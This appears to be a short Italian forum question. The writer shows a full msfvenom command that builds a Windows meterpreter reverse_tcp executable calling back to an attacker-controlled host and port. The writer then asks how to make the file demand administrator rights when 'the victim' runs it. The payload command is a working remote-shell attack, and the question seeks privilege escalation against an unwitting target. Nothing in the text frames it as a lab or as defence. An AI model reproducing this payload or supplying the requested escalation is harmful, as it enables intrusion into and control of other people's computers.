Quindi posso creare un payload di Windows con msfvenom
con un semplice comando, ad esempio:
msfvenom --platform Windows -p windows/x64/meterpreter/reverse_tcp
LHOST=192.168.58.109 LPORT=4485 EXITFUNC=thread -b '\x00'
-f exe-only -o mypayload.exe
Ma quando la vittima esegue il file .exe, non richiede i privilegi di amministratore. La vittima deve fare clic con il pulsante destro del mouse sul file .exe e selezionare run as administrator
, quindi confermare il prompt.
C'è un modo per fare aprire direttamente al prompt di amministrazione un file exe, senza dover cliccare su "Esegui come amministratore"?